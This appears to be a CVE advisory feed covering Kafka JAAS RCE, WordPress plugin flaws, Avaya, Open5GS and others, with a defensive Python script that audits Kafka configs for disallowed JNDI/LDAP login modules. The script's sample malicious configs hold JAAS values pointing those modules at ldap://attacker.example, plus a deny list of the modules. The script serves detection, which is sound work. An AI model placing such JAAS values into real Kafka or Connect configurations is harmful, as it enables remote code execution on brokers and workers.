7.5
CVE-2025-27819 - Apache Kafka: Possible RCE/Denial of service attack via SASL JAAS JndiLoginModule configuration
In CVE-2023-25194, we announced the RCE/denial-of-service attack via SASL JAAS JndiLoginModule configuration in the Kafka Connect API. The Kafka Connect API is not the only component vulnerable to this attack; Apache Kafka brokers have this vulnerability too. To exploit this vulnerability, the attacker needs to…
8.8
CVE-2025-27818 - Apache Kafka: Possible RCE attack via SASL JAAS LdapLoginModule configuration
A possible security vulnerability has been identified in Apache Kafka. This requires alterConfig access to the cluster resource, or access to a Kafka Connect worker and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which …
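As an added example (not Apache Kafka project code), the following audit parses `sasl.jaas.config` values from a broker or Kafka Connect connector configuration and flags any JAAS entry that names the JNDI or LDAP login modules referred to in the two Kafka entries above. The sample configurations, the `attacker.example` host and the set of disallowed modules are constructed for illustration; the module set mirrors the intent of Kafka's `org.apache.kafka.disallowed.login.modules` JVM system property, whose default value depends on the Kafka version, so check it against the release you run.

```python
"""Audit Kafka / Kafka Connect configs for JNDI- or LDAP-capable JAAS login modules.

Added example, not code from the Apache Kafka project.  The sample configs
below are constructed; "attacker.example" is a placeholder host.
"""
import re
from typing import Dict, List, Tuple

# JAAS entry grammar as accepted in `sasl.jaas.config`:
#   <LoginModuleClass> <flag> [key=value ...];   (one or more entries)
# Limitation: a ';' inside a quoted option value ends the entry early.
_JAAS_ENTRY = re.compile(
    r"\s*(?P<module>[\w.$]+)\s+(?P<flag>required|requisite|sufficient|optional)\b"
    r"(?P<opts>[^;]*);",
    re.IGNORECASE | re.DOTALL,
)
_JAAS_OPT = re.compile(r'([\w.]+)\s*=\s*("(?:[^"\\]|\\.)*"|\S+)')

# Login modules that can be pointed at an attacker-controlled JNDI/LDAP server.
# Assumption: mirrors the intent of Kafka's org.apache.kafka.disallowed.login.modules
# default; the real default differs by version, so verify it for your release.
DISALLOWED_LOGIN_MODULES = frozenset({
    "com.sun.security.auth.module.JndiLoginModule",
    "com.sun.security.auth.module.LdapLoginModule",
})


def parse_jaas_config(text: str) -> List[Tuple[str, str, Dict[str, str]]]:
    """Parse one sasl.jaas.config value into (module, flag, options) tuples."""
    entries = []
    for m in _JAAS_ENTRY.finditer(text):
        opts = {k: v.strip('"') for k, v in _JAAS_OPT.findall(m.group("opts"))}
        entries.append((m.group("module"), m.group("flag").lower(), opts))
    return entries


def audit_config(config: Dict[str, str]) -> List[str]:
    """Return one finding per JAAS entry that uses a disallowed login module.

    Every key ending in `sasl.jaas.config` is scanned, which covers the broker
    form (listener.name.<listener>.<mechanism>.sasl.jaas.config) as well as the
    Connect client-override form (producer.override.sasl.jaas.config, ...).
    """
    findings = []
    for key, value in config.items():
        if not key.lower().endswith("sasl.jaas.config"):
            continue
        for module, _flag, opts in parse_jaas_config(value):
            if module in DISALLOWED_LOGIN_MODULES:
                # JndiLoginModule uses user.provider.url; LdapLoginModule uses userProvider.
                target = opts.get("user.provider.url") or opts.get("userProvider") or "n/a"
                findings.append(f"{key}: {module} (lookup target: {target})")
    return findings


# Constructed sample configs (not taken from any real deployment).
SAFE_CONNECTOR = {
    "name": "orders-sink",
    "connector.class": "FileStreamSink",
    "producer.override.security.protocol": "SASL_SSL",
    "producer.override.sasl.mechanism": "PLAIN",
    "producer.override.sasl.jaas.config":
        'org.apache.kafka.common.security.plain.PlainLoginModule required '
        'username="svc" password="REDACTED";',
}

MALICIOUS_CONNECTOR = {
    "name": "orders-sink",
    "connector.class": "FileStreamSink",
    "producer.override.security.protocol": "SASL_SSL",
    "producer.override.sasl.mechanism": "PLAIN",
    "producer.override.sasl.jaas.config":
        'com.sun.security.auth.module.JndiLoginModule required '
        'user.provider.url="ldap://attacker.example:1389/a" useFirstPass="true";',
}

# Broker-side listener config using the LDAP module (constructed).
MALICIOUS_BROKER_LISTENER = {
    "listener.name.sasl_ssl.plain.sasl.jaas.config":
        'com.sun.security.auth.module.LdapLoginModule required '
        'userProvider="ldap://attacker.example:1389/ou=people" useSSL="false";',
}


if __name__ == "__main__":
    for label, cfg in (("safe connector", SAFE_CONNECTOR),
                       ("malicious connector", MALICIOUS_CONNECTOR),
                       ("malicious broker listener", MALICIOUS_BROKER_LISTENER)):
        print(f"{label}: {audit_config(cfg) or 'no findings'}")
```

Run the audit over the JSON returned by the Connect REST API's connector config endpoint or over a broker's `server.properties` turned into a dict; any finding is a configuration that should be impossible once the JVM property above lists the module.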
0.0
CVE-2025-5945 -
This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.
9.9
CVE-2025-1041 - Avaya Call Management System RCE vulnerability
An improper input validation flaw discovered in Avaya Call Management System could allow unauthorized remote command execution via a specially crafted web request. Affected versions include 18.x, 19.x prior to 19.2.0.7, and 20.x prior to 20.0.1.0.
8.8
CVE-2025-4954 - Axle Demo Importer <= 1.0.3 - Author+ Arbitrary File Upload
The Axle Demo Importer WordPress plugin through 1.0.3 does not validate files to be uploaded, which could allow authenticated users (author and above) to upload arbitrary files, such as PHP scripts, to the server.
7.5
CVE-2025-4840 - Likes and Dislikes Plugin <= 1.0.0 - Unauthenticated SQL Injection
The inprosysmedia-likes-dislikes-post WordPress plugin through 1.0.0 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to SQL injection.
6.9
CVE-2025-5952 - Zend.To NSSDropoff.php exec os command injection
A vulnerability, which was classified as critical, has been found in Zend.To up to 6.10-6 Beta. This issue affects the function exec of the file NSSDropoff.php. Manipulation of the argument file_1 leads to OS command injection. The attack may be initiated remotely. The exploit has been disclose…
6.9
CVE-2025-5935 - Open5GS AMF/MME emm-sm.c common_register_state denial of service
A vulnerability was found in Open5GS up to 2.7.3. It has been declared as problematic. Affected by this vulnerability is the function common_register_state of the file src/mme/emm-sm.c of the component AMF/MME. Manipulation of the argument ran_ue_id leads to denial of service. The attack can be…
6.4
CVE-2025-3076 - Elementor Pro <= 3.29.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
The Elementor Website Builder Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'button_text' parameter in all versions up to, and including, 3.29.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contr…
8.8
CVE-2025-4601 - RH - Real Estate WordPress Theme <= 4.4.0 - Authenticated (Subscriber+) Privilege Escalation
The "RH - Real Estate WordPress Theme" theme for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 4.4.0. This is due to the theme not properly restricting user roles that can be updated as part of the inspiry_update_profile() function. This makes it possible for…